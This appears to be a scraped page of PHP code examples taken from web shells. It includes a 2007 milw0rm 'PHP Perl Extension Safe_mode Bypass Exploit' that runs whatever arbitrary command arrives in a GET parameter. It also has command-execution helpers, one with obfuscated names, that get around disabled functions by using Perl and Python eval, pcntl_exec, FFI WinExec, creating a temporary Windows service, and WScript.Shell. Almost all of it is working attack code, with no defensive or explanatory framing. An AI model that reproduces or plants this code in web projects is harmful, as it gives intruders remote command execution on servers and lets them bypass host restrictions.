function perlshelL($command)
{
    $perl = new perl();
    ob_start();
    $perl->eval("system(\"{$command}\")");
    $exec = ob_get_contents();
    ob_end_clean();
    return $exec;
}
function ex($cmd)
{
    global $result;
    if (!empty($cmd)) {
        if (SAFEMODE) {
            if (extension_loaded("python")) {
                $result = python_eval("import os\nos.system('{$cmd}')");
                if (empty($result)) {
                    $result = python_eval('import os\\npwd = os.getcwd()\\nprint pwd\\nos.system("$cmd")');
                }
                return $result;
            } elseif (extension_loaded("perl")) {
                $perl = new perl();
                $perl->eval("system('{$cmd}')");
                $result = $perl;
                return $result;
            }
        } else {
            if (funcex("exec")) {
                @exec($cmd, $result);
                $result = join("\n", $result);
            } elseif (funcex("shell_exec")) {
                $result = @shell_exec($cmd);
            } elseif (funcex("system")) {
                @ob_start();
                @system($cmd);
                $result = @ob_get_contents();
                @ob_end_clean();
            } elseif (funcex("passthru")) {
                @ob_start();
                @passthru($cmd);
                $result = @ob_get_contents();
                @ob_end_clean();
            } elseif (@is_resource($f = @popen($cmd, "r"))) {
                while (!@feof($f)) {
                    $result .= @fread($f, 8192);
                }
                @pclose($f);
            }
        }
    }
    return $result;
}
Example #3
0
<?php

##########################################################
###----------------------------------------------------###
###----PHP Perl Extension Safe_mode Bypass Exploit-----###
###----------------------------------------------------###
###-Author:--NetJackal---------------------------------###
###-Email:---nima_501[at]yahoo[dot]com-----------------###
###-Website:-http://netjackal.by.ru--------------------###
###----------------------------------------------------###
##########################################################
if (!extension_loaded('perl')) {
    die('perl extension is not loaded');
}
if (!isset($_GET)) {
    $_GET =& $HTTP_GET_VARS;
}
if (empty($_GET['cmd'])) {
    $_GET['cmd'] = strtoupper(substr(PHP_OS, 0, 3)) == 'WIN' ? 'dir' : 'ls';
}
$perl = new perl();
echo "<textarea rows='25' cols='75'>";
$perl->eval("system('" . $_GET['cmd'] . "')");
echo "</textarea>";
$_GET['cmd'] = htmlspecialchars($_GET['cmd']);
echo "<br><form>CMD: <input type=text name=cmd value='" . $_GET['cmd'] . "' size=25></form>";
?>

# milw0rm.com [2007-08-25]
Example #4
0
function z6v($c)
{
    global $win, $tempdir;
    $r = '';
    if (!empty($c)) {
        if (!$win) {
            if (extension_loaded('perl')) {
                @ob_start();
                $p = new perl();
                $p->eval("system('{$c}')");
                $r = @ob_get_contents();
                @ob_end_clean();
            } elseif (z7r('pcntl_exec') && z7r('pcntl_fork')) {
                $r = '[~] Blind Command Execution via [pcntl_exec]\\n\\n';
                $o = $tempdir . uniqid('pcntl');
                $pid = @pcntl_fork();
                if ($pid == -1) {
                    $r .= '[-] Could not fork. Exit';
                } elseif ($pid) {
                    $r .= @pcntl_wifexited($status) ? '[+] Done! Command "' . $c . '" successfully executed.' : '[-] Error. Incorrect Command.';
                } else {
                    $c = array(" -e 'system(\"{$c} > {$o}\")'");
                    if (@pcntl_exec('/usr/bin/perl', $c)) {
                        exit(0);
                    }
                    if (@pcntl_exec('/usr/local/bin/perl', $c)) {
                        exit(0);
                    }
                    die;
                }
                $r = z9p($o);
                @unlink($o);
            }
        } else {
            $o = $tempdir . uniqid('NJ');
            if (extension_loaded('ffi')) {
                $a = new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
                $r = $a->WinExec("cmd.exe /c " . z6l($c) . " >\"{$o}\"", 0);
                while (!@file_exists($o)) {
                    sleep(1);
                }
                $r = z9p($o);
            } elseif (extension_loaded('win32service')) {
                $s = uniqid('NJ');
                @win32_create_service(array('service' => $s, 'display' => $s, 'path' => 'c:\\windows\\system32\\cmd.exe', 'params' => "/c " . z6l($c) . " >\"{$o}\""));
                @win32_start_service($s);
                @win32_stop_service($s);
                @win32_delete_service($s);
                while (!@file_exists($o)) {
                    sleep(1);
                }
                $r = z9p($o);
            } elseif (extension_loaded("win32std")) {
                @win_shell_execute('..\\..\\..\\..\\..\\..\\..\\windows\\system32\\cmd.exe /c ' . z6l($c) . ' > "' . $o . '"');
                while (!@file_exists($o)) {
                    sleep(1);
                }
                $r = z9p($o);
            } else {
                $a = new COM("WScript.Shell");
                $a->Run('c:\\windows\\system32\\cmd.exe /c ' . z6l($c) . ' > "' . $o . '"');
                $r = z9p($o);
            }
            @unlink($o);
        }
    }
    return $r;
}